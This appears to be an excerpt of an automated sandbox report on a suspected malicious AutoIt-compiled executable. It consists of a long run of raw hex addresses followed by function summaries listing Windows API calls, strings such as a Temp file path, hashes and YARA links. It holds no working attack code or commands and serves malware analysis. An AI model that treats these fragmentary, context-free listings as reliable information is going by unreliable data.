                            0x00abbb27
                            0x00abbb35
                            0x00abbb3a
                            0x00abbb3e
                            0x00000000
                            0x00abbb3e
                            0x00abb364
                            0x00abb366
                            0x00abb369
                            0x00abb36d
                            0x00abb371
                            0x00abb373
                            0x00abb375
                            0x00abb37d
                            0x00abb382
                            0x00abb385
                            0x00abb389
                            0x00abb38a
                            0x00abb38b
                            0x00abb38c
                            0x00abb38e
                            0x00abb393
                            0x00abb395
                            0x00abbb44
                            0x00abbb47
                            0x00abbb4c
                            0x00abbb57
                            0x00abbb5c
                            0x00000000
                            0x00abbb5c
                            0x00abb39b
                            0x00abb39f
                            0x00abb3a3
                            0x00abb3ab
                            0x00abb3b0
                            0x00abb3b2
                            0x00abb3b7
                            0x00abb3bb
                            0x00000000
                            0x00abb3bb
                            0x00abb30d
                            0x00abb311
                            0x00abb315
                            0x00abb325
                            0x00abb325
                            0x00abb338
                            0x00abb33d
                            0x00abb33f
                            0x00abbafa
                            0x00abbafd
                            0x00abbb02
                            0x00abbb10
                            0x00abbb15
                            0x00abbb19
                            0x00000000
                            0x00abbb19
                            0x00abb345
                            0x00000000
                            0x00abb345
                            0x00abb31b
                            0x00abb31f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a9b066
                            0x00a9b067
                            0x00a9b06c
                            0x00000000
                            0x00000000
                            0x00a9b110
                            0x00a9b111
                            0x00a9b116
                            0x00000000
                            0x00000000
                            0x00a9b106
                            0x00a9b108
                            0x00a9b109
                            0x00000000
                            0x00000000
                            0x00abb1ca
                            0x00abb1cb
                            0x00abb1d0
                            0x00000000
                            0x00000000
                            0x00abb1f1
                            0x00abb1f2
                            0x00abb1f7
                            0x00000000
                            0x00000000
                            0x00abb1e4
                            0x00abb1e5
                            0x00abb1ea
                            0x00000000
                            0x00000000
                            0x00a9af1c
                            0x00a9af1d
                            0x00a9af22
                            0x00000000
                            0x00000000
                            0x00a9af29
                            0x00a9af2a
                            0x00a9af2f
                            0x00000000
                            0x00000000
                            0x00a9ae4e
                            0x00a9ae52
                            0x00a9ae55
                            0x00a9afde
                            0x00a9afe1
                            0x00000000
                            0x00000000
                            0x00abb126
                            0x00a9ae60
                            0x00a9ae60
                            0x00a9ae61
                            0x00000000
                            0x00a9ae61
                            0x00a9ae5b
                            0x00a9ae5b
                            0x00000000
                            0x00000000
                            0x00abb130
                            0x00abb134
                            0x00abb137
                            0x00abb14b
                            0x00abb14b
                            0x00abb150
                            0x00abb150
                            0x00abb151
                            0x00000000
                            0x00abb151
                            0x00abb13d
                            0x00abb142
                            0x00abb145
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a9ae8d
                            0x00a9ae8e
                            0x00a9ae93
                            0x00000000
                            0x00000000
                            0x00a9ada2
                            0x00a9ada7
                            0x00000000
                            0x00000000
                            0x00a9af36
                            0x00a9af37
                            0x00a9af3c
                            0x00000000
                            0x00000000
                            0x00abb1d7
                            0x00abb1d8
                            0x00abb1dd
                            0x00000000
                            0x00000000
                            0x00abb1fe
                            0x00abb1ff
                            0x00abb204
                            0x00a9aa8d
                            0x00a9aa8d
                            0x00a9aa91
                            0x00a9aa95
                            0x00a9aa95
                            0x00a9aa99
                            0x00a9aa9f
                            0x00a9adae
                            0x00a9aaa5
                            0x00a9aaa5
                            0x00a9aaa5
                            0x00a9aaac
                            0x00a9aab7
                            0x00a9ad3c
                            0x00a9ad3f
                            0x00a9ad6f
                            0x00a9ad6f
                            0x00a9ad72
                            0x00a9b087
                            0x00a9b087
                            0x00a9b08c
                            0x00a9ad81
                            0x00a9ad81
                            0x00a9aa50
                            0x00a9aa50
                            0x00a9aa50
                            0x00a9aa55
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a9aa55
                            0x00000000
                            0x00a9aa50
                            0x00a9b09f
                            0x00a9b0a6
                            0x00a9b0ab
                            0x00a9b0ad
                            0x00abba6b
                            0x00abba6b
                            0x00abba70
                            0x00a9b0ca
                            0x00a9b0ce
                            0x00a9b0d3
                            0x00000000
                            0x00a9b0d3
                            0x00abba76
                            0x00abba7b
                            0x00abba80
                            0x00abba85
                            0x00abba87
                            0x00abbbc9
                            0x00abbbce
                            0x00abbbd2
                            0x00abbbd2
                            0x00abbbd7
                            0x00abbbdb
                            0x00abbbdc
                            0x00abbbdc
                            0x00abbbe5
                            0x00abbbea
                            0x00a9aaf4
                            0x00a9aafa
                            0x00a9aafa
                            0x00abba8d
                            0x00abba91
                            0x00abba95
                            0x00abbaaa
                            0x00abbab3
                            0x00abba9b
                            0x00abba9b
                            0x00abbaa4
                            0x00abbaa4
                            0x00abbab9
                            0x00abbaba
                            0x00abbac3
                            0x00000000
                            0x00abbac3
                            0x00a9b0b3
                            0x00a9b0b8
                            0x00a9b0bc
                            0x00000000
                            0x00000000
                            0x00a9b0c2
                            0x00a9b0c4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a9b0c4
                            0x00a9ad78
                            0x00a9ad7b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a9ad7b
                            0x00a9ad41
                            0x00000000
                            0x00a9ad48
                            0x00a9ad4a
                            0x00a9ae26
                            0x00a9ae28
                            0x00a9ad50
                            0x00a9ad50
                            0x00a9ad52
                            0x00a9ad57
                            0x00a9ad5a
                            0x00a9ad5c
                            0x00abba64
                            0x00a9ad62
                            0x00a9ad62
                            0x00a9ad62
                            0x00a9ad64
                            0x00a9ad67
                            0x00a9ad67
                            0x00a9ad6b
                            0x00a9ad6b
                            0x00a9ad6b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a9aee0
                            0x00a9aee0
                            0x00a9aee4
                            0x00a9aee6
                            0x00a9af51
                            0x00a9aee8
                            0x00a9aee8
                            0x00a9aee8
                            0x00a9aeeb
                            0x00a9aeee
                            0x00000000
                            0x00000000
                            0x00a9aef0
                            0x00a9aef2
                            0x00a9af55
                            0x00a9aef4
                            0x00a9aef4
                            0x00a9aef4
                            0x00a9aef7
                            0x00a9aefa
                            0x00000000
                            0x00a9af00
                            0x00a9af00
                            0x00a9af05
                            0x00a9af09
                            0x00a9af0e
                            0x00a9af10
                            0x00000000
                            0x00a9af16
                            0x00a9af16
                            0x00000000
                            0x00a9af16
                            0x00a9af10
                            0x00a9aefa
                            0x00a9af43
                            0x00a9af47
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abbb91
                            0x00abbb95
                            0x00abbb9d
                            0x00000000
                            0x00000000
                            0x00abbba7
                            0x00abbbab
                            0x00abbbb3
                            0x00000000
                            0x00000000
                            0x00abbb7b
                            0x00abbb7b
                            0x00abbb7f
                            0x00abbb87
                            0x00000000
                            0x00000000
                            0x00a9ad41
                            0x00a9aac2
                            0x00000000
                            0x00000000
                            0x00a9aac8
                            0x00a9aace
                            0x00a9ae68
                            0x00a9ae70
                            0x00a9ae70
                            0x00a9ae73
                            0x00a9ae78
                            0x00a9ae79
                            0x00a9ae7e
                            0x00a9ae81
                            0x00a9ae83
                            0x00a9ae83
                            0x00a9ae70
                            0x00a9aad4
                            0x00a9aada
                            0x00a9aaf2
                            0x00a9aaf2
                            0x00000000
                            0x00a9aae0
                            0x00a9aae0
                            0x00a9aae0
                            0x00a9aae3
                            0x00a9aae4
                            0x00a9aae9
                            0x00a9aaec
                            0x00a9aaee
                            0x00000000
                            0x00a9aae0
                            0x00a9ae0b
                            0x00a9ae0b
                            0x00a9ae10
                            0x00a9ae14
                            0x00a9ae19
                            0x00a9ae19
                            0x00abbb65
                            0x00abbb71
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a9ad9a
                            0x00a9ac4e
                            0x00a9ac52
                            0x00a9ac5a
                            0x00a9ac5c
                            0x00a9adb6
                            0x00a9adbb
                            0x00a9ae3b
                            0x00a9ae40
                            0x00a9ae44
                            0x00a9adbd
                            0x00a9adbd
                            0x00a9adbf
                            0x00a9adc4
                            0x00a9adc7
                            0x00a9adc9
                            0x00abb649
                            0x00a9adcf
                            0x00a9adcf
                            0x00a9add3
                            0x00a9addc
                            0x00a9ade1
                            0x00a9ade3
                            0x00a9ade3
                            0x00a9adeb
                            0x00a9adee
                            0x00a9adee
                            0x00a9acd0
                            0x00a9acd8
                            0x00a9acdb
                            0x00a9acdc
                            0x00a9ace0
                            0x00a9ace3
                            0x00a9adf7
                            0x00a9adfc
                            0x00abb654
                            0x00a9ae02
                            0x00a9ae02
                            0x00a9ae02
                            0x00a9ace9
                            0x00a9ace9
                            0x00a9ace9
                            0x00a9aceb
                            0x00a9aced
                            0x00a9acf0
                            0x00a9acf4
                            0x00a9acf6
                            0x00abb65d
                            0x00abb662
                            0x00abb666
                            0x00abb666
                            0x00a9acfc
                            0x00a9acff
                            0x00a9ad02
                            0x00abb672
                            0x00abb674
                            0x00abb676
                            0x00000000
                            0x00000000
                            0x00abb67d
                            0x00abb685
                            0x00abb686
                            0x00abb68b
                            0x00abb68f
                            0x00000000
                            0x00a9ad08
                            0x00a9ad08
                            0x00a9ad08
                            0x00a9ad0b
                            0x00abb697
                            0x00abb699
                            0x00abb69b
                            0x00abb6a2
                            0x00abb6a7
                            0x00abb6a7
                            0x00a9ad11
                            0x00a9ad11
                            0x00a9ad14
                            0x00abb6b2
                            0x00abb6b7
                            0x00a9ad1a
                            0x00a9ad1a
                            0x00a9ad1d
                            0x00abb6c5
                            0x00abb6c6
                            0x00abb6d0
                            0x00abb6d1
                            0x00abb6d6
                            0x00abb6da
                            0x00a9ad23
                            0x00a9ad23
                            0x00a9ad26
                            0x00abb6e2
                            0x00abb6e4
                            0x00abb6e6
                            0x00abb6ed
                            0x00abb6f2
                            0x00abb6f2
                            0x00abb6e6
                            0x00a9ad26
                            0x00a9ad1d
                            0x00a9ad14
                            0x00a9ad2c
                            0x00a9ad2c
                            0x00a9ad33
                            0x00a9ad35
                            0x00000000
                            0x00a9ad35
                            0x00a9ad02
                            0x00a9ac62
                            0x00a9ac68
                            0x00000000
                            0x00000000
                            0x00a9ac6a
                            0x00a9ac6d
                            0x00a9ac6f
                            0x00abb3c4
                            0x00abb3c9
                            0x00abb3c9
                            0x00a9ac75
                            0x00a9ac78
                            0x00a9ac7b
                            0x00abb3d5
                            0x00abb3d7
                            0x00abb3d9
                            0x00000000
                            0x00000000
                            0x00abb3e0
                            0x00abb3e8
                            0x00abb3e9
                            0x00abb3ee
                            0x00000000
                            0x00a9ac81
                            0x00a9ac81
                            0x00a9ac81
                            0x00a9ac84
                            0x00abb3f6
                            0x00abb3f8
                            0x00abb3fa
                            0x00abb401
                            0x00abb401
                            0x00a9ac8a
                            0x00a9ac8a
                            0x00a9ac8d
                            0x00abb40d
                            0x00a9ac93
                            0x00a9ac93
                            0x00a9ac96
                            0x00abb41c
                            0x00abb41d
                            0x00abb427
                            0x00abb428
                            0x00abb42d
                            0x00a9ac9c
                            0x00a9ac9c
                            0x00a9ac9f
                            0x00abb435
                            0x00abb437
                            0x00abb439
                            0x00abb440
                            0x00abb440
                            0x00abb439
                            0x00a9ac9f
                            0x00a9ac96
                            0x00a9ac8d
                            0x00a9aca5
                            0x00a9aca5
                            0x00a9acac
                            0x00a9acb2
                            0x00a9acb7
                            0x00a9acba
                            0x00a9acbf
                            0x00a9acc2
                            0x00abb44a
                            0x00abb44b
                            0x00abb44e
                            0x00000000
                            0x00000000
                            0x00abb454
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abb461
                            0x00abb463
                            0x00abb469
                            0x00000000
                            0x00000000
                            0x00abb471
                            0x00abb477
                            0x00000000
                            0x00000000
                            0x00abb47e
                            0x00abb480
                            0x00abb485
                            0x00abb488
                            0x00abb48a
                            0x00abb4b6
                            0x00abb4b8
                            0x00abb490
                            0x00abb490
                            0x00abb496
                            0x00abb498
                            0x00abb49a
                            0x00abb49d
                            0x00abb4a0
                            0x00abb4a3
                            0x00abb4a6
                            0x00abb4a9
                            0x00abb4ac
                            0x00abb4ae
                            0x00abb4ae
                            0x00000000
                            0x00000000
                            0x00abb4d9
                            0x00abb4de
                            0x00abb4e3
                            0x00abb4e6
                            0x00abb4e8
                            0x00abb50d
                            0x00abb50d
                            0x00abb4ee
                            0x00abb4ee
                            0x00abb4f4
                            0x00abb4f8
                            0x00abb4fd
                            0x00abb4ff
                            0x00abb4ff
                            0x00abb4ff
                            0x00abb501
                            0x00abb505
                            0x00abb505
                            0x00abb50f
                            0x00abb511
                            0x00abb515
                            0x00abb51b
                            0x00abb51e
                            0x00abb51e
                            0x00000000
                            0x00000000
                            0x00abb4c0
                            0x00abb4c5
                            0x00000000
                            0x00000000
                            0x00abb4cc
                            0x00abb4d2
                            0x00000000
                            0x00000000
                            0x00abb525
                            0x00abb52c
                            0x00abb532
                            0x00abb534
                            0x00abb539
                            0x00abb53c
                            0x00abb53d
                            0x00abb53f
                            0x00abb545
                            0x00abb54b
                            0x00abb54d
                            0x00abb54e
                            0x00abb54f
                            0x00abb555
                            0x00abb557
                            0x00abb55d
                            0x00abb55f
                            0x00abb560
                            0x00abb566
                            0x00abb568
                            0x00abb569
                            0x00abb56e
                            0x00abb571
                            0x00abb571
                            0x00abb557
                            0x00000000
                            0x00000000
                            0x00abb57c
                            0x00abb581
                            0x00000000
                            0x00000000
                            0x00abb588
                            0x00abb58a
                            0x00abb58f
                            0x00abb592
                            0x00abb594
                            0x00000000
                            0x00000000
                            0x00abb59a
                            0x00abb5a2
                            0x00abb5a7
                            0x00000000
                            0x00000000
                            0x00abb5b7
                            0x00abb5b9
                            0x00abb5be
                            0x00abb5c0
                            0x00abb5c6
                            0x00abb5c8
                            0x00abb5ca
                            0x00abb5cc
                            0x00abb5ce
                            0x00abb5d1
                            0x00abb5d3
                            0x00abb607
                            0x00abb609
                            0x00abb60e
                            0x00abb610
                            0x00abb613
                            0x00abb615
                            0x00abb618
                            0x00abb61b
                            0x00abb5d9
                            0x00abb5d9
                            0x00abb5da
                            0x00abb5df
                            0x00abb5e1
                            0x00abb5e4
                            0x00abb5e6
                            0x00abb5e8
                            0x00abb5ee
                            0x00abb5f1
                            0x00abb5f5
                            0x00abb5fa
                            0x00abb5ff
                            0x00000000
                            0x00000000
                            0x00abb623
                            0x00abb625
                            0x00abb62a
                            0x00abb62d
                            0x00abb62f
                            0x00abb5ae
                            0x00abb5ae
                            0x00abb5b0
                            0x00000000
                            0x00abb5b0
                            0x00abb635
                            0x00abb63d
                            0x00abb642
                            0x00000000
                            0x00000000
                            0x00abb454
                            0x00a9acc8
                            0x00a9acc8
                            0x00a9acce
                            0x00000000
                            0x00a9acce
                            0x00a9ac7b
                            0x00a9aa88
                            0x00a9aa88
                            0x00000000
                            0x00a9aa88

                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _malloc
                            • String ID: Default
                            • API String ID: 1579825452-753088835
                            • Opcode ID: 89635456c140488c7deb427976bd35c3d3374198295fe3bff371cf579c97f5a4
                            • Instruction ID: 706fd9897fbae8c5738646b8c48671386dcfcafefbc3dcf136a49b89a66f0114
                            • Opcode Fuzzy Hash: 89635456c140488c7deb427976bd35c3d3374198295fe3bff371cf579c97f5a4
                            • Instruction Fuzzy Hash: 99727DB0614301DFCB14DF28C585A6AB7F5AFA9310F24885EE8868B352D775EC45CBA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A91340, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129timewindowCOMMON
                            Download Yara Rule
                            APIs
                            • DefWindowProcW.USER32(?,?,?,?), ref: 00A91376
                            • KillTimer.USER32(?,00000001), ref: 00A913F9
                              • Part of subcall function 00A91240: _memset.LIBCMT ref: 00A9126B
                              • Part of subcall function 00A91240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A9129B
                            • PostQuitMessage.USER32(00000000), ref: 00A9140B
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow_memset
                            • String ID: TaskbarCreated
                            • API String ID: 1519149367-2362178303
                            • Opcode ID: 6c09a6a6418e65054aafb07c460b373ba5b96bffaeb1670fc22841e5185d1772
                            • Instruction ID: 72623444b2a83df09f41b2ff8c6241c7b16cf79850e391da43c7d90bbb8bdc09
                            • Opcode Fuzzy Hash: 6c09a6a6418e65054aafb07c460b373ba5b96bffaeb1670fc22841e5185d1772
                            • Instruction Fuzzy Hash: 4641FE7674820A9BDF20DB68EC86BEE33F9F754310F604526F9158B591CEB19C4087A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9FE90, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fread_nolock_fseek_memmove
                            • String ID: AU3!$EA06
                            • API String ID: 3969463491-2658333250
                            • Opcode ID: 9b11b6ab3a7f64144dc969eb53850b661d32b64703f29e4d47059241d25e51f6
                            • Instruction ID: 81759568ccc760c9e3920b31441c384935644688eb901f6754df9a60c46946df
                            • Opcode Fuzzy Hash: 9b11b6ab3a7f64144dc969eb53850b661d32b64703f29e4d47059241d25e51f6
                            • Instruction Fuzzy Hash: 67412A72A041485FCF15DB68C881FFD3BB5AB0B304F6444B9F985D7143E67099818B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A91490, Relevance: 12.1, APIs: 8, Instructions: 86windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00A914BC
                              • Part of subcall function 00A91E00: _memset.LIBCMT ref: 00A91E90
                              • Part of subcall function 00A91E00: _wcsncpy.LIBCMT ref: 00A91ED2
                              • Part of subcall function 00A91E00: _wcscpy.LIBCMT ref: 00A91EF1
                              • Part of subcall function 00A91E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A91F03
                            • KillTimer.USER32(?,?,?,?,?), ref: 00A91513
                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 00A91522
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00AB7BC8
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00AB7C1C
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00AB7C67
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 1792922140-0
                            • Opcode ID: 5e0512415053a1b83bc9b8c849ae39326c296ef846e13f89db9dbfc7b9b3e459
                            • Instruction ID: dcb954038c1153225f11985134b7e6a9dc9214a3fa6be92469e14214538bd6d9
                            • Opcode Fuzzy Hash: 5e0512415053a1b83bc9b8c849ae39326c296ef846e13f89db9dbfc7b9b3e459
                            • Instruction Fuzzy Hash: 37316370608659BFEF26DB24CC95BEAFBBDBB46304F004185E18E97241CB705A958F91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E700, Relevance: 10.7, APIs: 7, Instructions: 157COMMON
                            Download Yara Rule
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 00A9E72A
                              • Part of subcall function 00A92390: _wcslen.LIBCMT ref: 00A9239D
                              • Part of subcall function 00A92390: _memmove.LIBCMT ref: 00A923C3
                            • GetCurrentProcess.KERNEL32(?), ref: 00A9E7D4
                            • GetNativeSystemInfo.KERNEL32(?), ref: 00A9E832
                            • FreeLibrary.KERNEL32(?), ref: 00A9E842
                            • FreeLibrary.KERNEL32(?), ref: 00A9E854
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                            • String ID:
                            • API String ID: 3363477735-0
                            • Opcode ID: 5e3dc935b09761214e7d9176a67239c55eb7be17a99cf623397a74055fe9dc4f
                            • Instruction ID: 4897a52df719e61aca72bc519695d180568a3c7a1246727af7f539df6ef8b285
                            • Opcode Fuzzy Hash: 5e3dc935b09761214e7d9176a67239c55eb7be17a99cf623397a74055fe9dc4f
                            • Instruction Fuzzy Hash: 7161AE70E08686EECB10DFA4C8846DCFFF4BF09304F14855AD444A7B42D3B9A998CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F3B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                            • SHGetMalloc.SHELL32(00A9F1FC), ref: 00A9F3BD
                            • SHGetDesktopFolder.SHELL32(?,00B390E8), ref: 00A9F3D2
                            • _wcsncpy.LIBCMT ref: 00A9F3ED
                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00A9F427
                            • _wcsncpy.LIBCMT ref: 00A9F440
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                            • String ID: C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg
                            • API String ID: 3170942423-1666458635
                            • Opcode ID: ed5a2ce19e9bbbcbf314c3c34b5d4fc9df0620a2ca6c80bd9f2d363e6cffdbb8
                            • Instruction ID: c3b9516bbb24e7445d79eb64941385bc7a7898a6e1356ab107826b99386610d3
                            • Opcode Fuzzy Hash: ed5a2ce19e9bbbcbf314c3c34b5d4fc9df0620a2ca6c80bd9f2d363e6cffdbb8
                            • Instruction Fuzzy Hash: 72215175A00619ABDB14DBA4DC84DEFB37DEF88700F108698F905D7250EA30AE559BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E6C0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,00A9E6A1), ref: 00A9E6DD
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,00A9E6A1,00000000,?,?,?,00A9E6A1), ref: 00AB7117
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,00A9E6A1,?,00000000,?,?,?,?,00A9E6A1), ref: 00AB715E
                            • RegCloseKey.ADVAPI32(?,?,?,?,00A9E6A1), ref: 00AB718F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID: Include$Software\AutoIt v3\AutoIt
                            • API String ID: 1586453840-614718249
                            • Opcode ID: 21bd67e37536bd8c9a01b0a3fcce6876b958ac5d575c4f01f4f14cb78ed3cea1
                            • Instruction ID: b6003bae0c738f28098c740e0b964e742ca5a74352743bcc0eff4b3e218aa034
                            • Opcode Fuzzy Hash: 21bd67e37536bd8c9a01b0a3fcce6876b958ac5d575c4f01f4f14cb78ed3cea1
                            • Instruction Fuzzy Hash: 5E21D572B80204BBDB14DBA8DD46FEFB3BDEF94700F104259F505E7191EAB1AA008750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA0350, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • CreateWindowExW.USER32 ref: 00AA0385
                            • CreateWindowExW.USER32 ref: 00AA03AE
                            • ShowWindow.USER32(?,00000000), ref: 00AA03C4
                            • ShowWindow.USER32(?,00000000), ref: 00AA03CE
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: 2c80c1bc9f89649160a1be2de4664d698455ea42121a5cab8fa4be00372d13b1
                            • Instruction ID: 857ec1696bcce984e1cbeba1fcd42de329e5b357bb6268e2bca2588d7d7c11d3
                            • Opcode Fuzzy Hash: 2c80c1bc9f89649160a1be2de4664d698455ea42121a5cab8fa4be00372d13b1
                            • Instruction Fuzzy Hash: 1CF0B771BD5314BAF6309764AC53F926698E718F11F304466B700BB1E0DEE479518BDC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA06E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                            Download Yara Rule
                            APIs
